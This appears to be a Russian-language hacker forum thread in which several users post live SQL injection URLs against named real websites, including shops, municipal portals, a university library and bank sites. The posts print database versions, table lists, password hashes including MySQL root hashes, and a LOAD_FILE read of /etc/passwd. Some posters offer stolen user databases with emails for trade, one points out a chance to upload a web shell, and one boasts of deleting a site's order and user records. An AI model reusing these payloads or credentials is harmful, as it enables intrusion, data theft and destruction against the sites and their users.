во, млин, запарило... по работе нужно лазить по чужим сайтам с ВЕЧЕРНИМИ ПЛАТЬЯМИ и смотреть разные фишки на сайтах... после 10-го или 15-го решил отвлечься: результат: http://www.solange.ru/gallery/shop.phtm?s=99999+union+select+1,VERSION(),3,4,5/* 4.1.21-standard [email protected] intermoda
www.humanmedia.ru Наша компания является эксклюзивным продавцом рекламного времени на тематических каналах «НТВ-Плюс». Фактически это новый инструмент рекламных коммуникаций. version() >5 (information_schema) логин - nets пароль - nets привы - 1 Админку ненашел 8( письмо админу отправил 8)
Только учусь! ------------------------------ http://donetsk.life.dn.ua/ Комунальный портал города Донецка. ------------------------------- 5.0.37-log life life@localhost ------------------------------- http://donetsk.life.dn.ua/nb/view.php?id=-5995/**/union/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,10/**/from/**/forums_auth/**/limit/**/1,1/* ------------------------------- есть интересные таблицы: (но я их не перебирал) board_admin_comment f1 f1_bodies f2 f2_bodies f3 f3_bodies f4 f4_bodies f5 f5_bodies forums forums_auth forums_forum2group forums_groups forums_moderators forums_user2group gal_user guide mail_archieve maillist maillist_users poll_poll poll_vote prob --------------------- если кто вытянет полную базу-киньте в личку(интересно посмотреть, а колупаться дальше влом
И снова горе веб-дизайнеры: "GiG Web solutions" Киев Форум - Web программирование (PHP,HTML,CSS,JavaScript,ASP) _http://gig.kiev.ua/show_message.php?conf_id=-8+union+select+1,aes_decrypt(aes_encrypt(user(),0x71),0x71),3,4,5,6/*&upper_id=0 gigkievua_user@localhost gigkievua_db1 5.0.41-community ветка пятая, раскручивать не стал КТО ИМ ДАЁТ ДЕНЕГ???
все таки решил добить сам. пользователей больше 2000 (у меня пока 700, но скоро добъю) вывод типа имя пользователя,пароль,имя,мыло,аська(оч много элитных. Хотел бы себе ) кому надо обращайтесь в личку поделюсь. ------------------------------ прошу прощенья, если не в этой теме. Не наказывайте пожалуйста
банкирЫЫЫ -) мда, все-таки решил выложить на благо родного ачата... ВНИМАНИЕ: Сегодня у нас БАНК (точнее сайт онлайн банкинга) - дырявый как windows 98 =) Версия мускула - 5 с хреном, соответственно, есть доступ к : Наиболее приглянувшиеся мне таблицы: =================================== isearch_admin_log messages message_id message_image message_month message_year message_title specials id titel text image active ... users id username password admin lastlogin =================================== и самое интересное - КАВЫЧКИ НЕ ФИЛЬТРУЮТСЯ ВООБЩЕ!!! так что, есть возможность залить шелл. Вобщем, пользуйтесь на здоровье
fantastic.library.cornell.edu Code: http://fantastic.library.cornell.edu/imagerecord_l.php?record=6+union+select+concat_ws(0x3a3a3a,user(),database(),version()),2,3,4,5,6,7,8,9,10,11,12+from+mysql.user/* user() = fan@localhost database() - fantastic version() - 4.1.7-standart Code: http://fantastic.library.cornell.edu/imagerecord_l.php?record=6+union+select+LOAD_FILE(0x2f6574632f706173737764),2,3,4,5,6,7,8,9,10,11,12/* Code: http://fantastic.library.cornell.edu/imagerecord_l.php?record=6+union+select+concat_ws(0x3a3a3a,user,password),2,3,4,5,6,7,8,9,10,11,12+from+mysql.user/* Смотрим исходник =)
FreeBSD Forum!! cycyouth.org ROOT root:*D4F86802E5F140FEA24A52DF0D5B9B0381A5119D:Y tukums.lv ROOT *923518145726A3E8F9098E43D6A56C2BC44BD1DC
Внимание!!! никто никогда не хотел себе швейцарские часы? теперь вы можете себе такое позволить :-D --------------------------------------------------------------- шоп специализирующийся на продаже швейцарских часов ---------------------------------------------------------------- http://www.deka.dn.ua/navigation.php?nav_id=-8+union+select+1,2,3,4,5,6,concat(version(),0x3a,user(),0x3a,database()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/* 4.0.24-log:bazik@localhost:deka --------------------------------------------------------------- письмо админу отправил
Карейдзы нах! После часика мучений удалос убить базу заказоф и юзероф и добавить новай тур = ) http://img264.imageshack.us/my.php?image=kareidzigz5.jpg
computergiants.com Шоп....Просто Шоп _http://www.computergiants.com/stores/sitelet.asp?siteletid=-1'%66%72%6f%6d+1,2/*
Светотехника http://www.svetotehnika.dn.ua/templates/svet/index.php?id=181&show=news&newid=-8459+union+select+1,concat_ws(0x3a,version(),user(),database()),3/* 5.0.32-Debian_7etch1-log:[email protected]:firstline_base имена таблиц странные: 2103_forum_auth_access 2103_forum_banlist 2103_forum_categories 2103_forum_config 2103_forum_confirm 2103_forum_disallow 2103_forum_forum_prune 2103_forum_forums 2103_forum_groups 2103_forum_posts 2103_forum_privmsgs 2103_forum_privmsgs_text 2103_forum_ranks 2103_forum_sessions_keys 2103_forum_user_group 2103_forum_users
Туристическое снаряжение ------------------------------------- http://www.alexikaoutdoor.com.ua/product.php?prod_id=-177+union+select+1,2,3,4,5,6,7,8,9,10/* 4.0.27-standard-log:dumala2_alexikaoutdoor:dumala2_axbase@localhost
Code: http://www.hpol.org/transcript.php?id=-72+union+select+null,user(),version(),null,version()/* user:ro@localhost ver:5.0.27 db:hpol нет file_priv !
банк _http://www.eccb-centralbank.org/News/press.asp?offset= -1' SE LECT TABL E_SCHEMA,COLUMN_NAME FROM INFORMATION_SCH EMA.COLUMNS
brocken.de HTML: http://www.brocken.de/community/pinnwand/pinnwand.php?IDMBTH=-12+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3,4,5,6,7,8,9,10/*&UID=0&tx=1203010570&chat= brocken@localhost:4.1.22-log:brocken_community --------------------------------------------------------- ci.emeryville.ca.us HTML: http://www.ci.emeryville.ca.us/calendar/print/week.php?cid=-1+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3,4,5,6,7/*&catid=1&d=&w=4&m=-14&y=2006 [email protected]:4.1.20:mysql HTML: http://www.ci.emeryville.ca.us/calendar/week.php?cid=-1+union+select+0,1,concat(user,0x3a,password),3,4,5,6,7+from+mysql.user/* root:13d6f0d419ea128c --------------------------------------------------------- wcfcroquet.org HTML: http://www.wcfcroquet.org/calendarexpress2.1/year.php?catid=-4+union+select+0,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE())+using+latin1),2/*&cid=&w=&d=9&m=1&y=2008&selection=1 [email protected]:4.1.10a:wcfcal --------------------------------------------------------- phplite.com HTML: http://www.phplite.com/products/calendarexpress/demo/admin/userdetails.php?uid=-9+union+select+0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),2,3,4,5,6,7,8/* phplite@localhost:4.1.22-standard:cosmo_ce2
reversedelta.com user() = reversedelta@localhost version() = 4.1.22-standard database() = reversedelta_-_content
Донецкий комбинат замороженных продуктов http://www.tsundon.dn.ua/news-full.php?nid=-16+union+select+1,2,3,4,5/* 4.1.22-log:tsundon@localhost:tsundon tbl_news другие таблицы не нашел. --------------------------------------- оч интересный вывод ошибки, по крайней мере я еще такой не видел
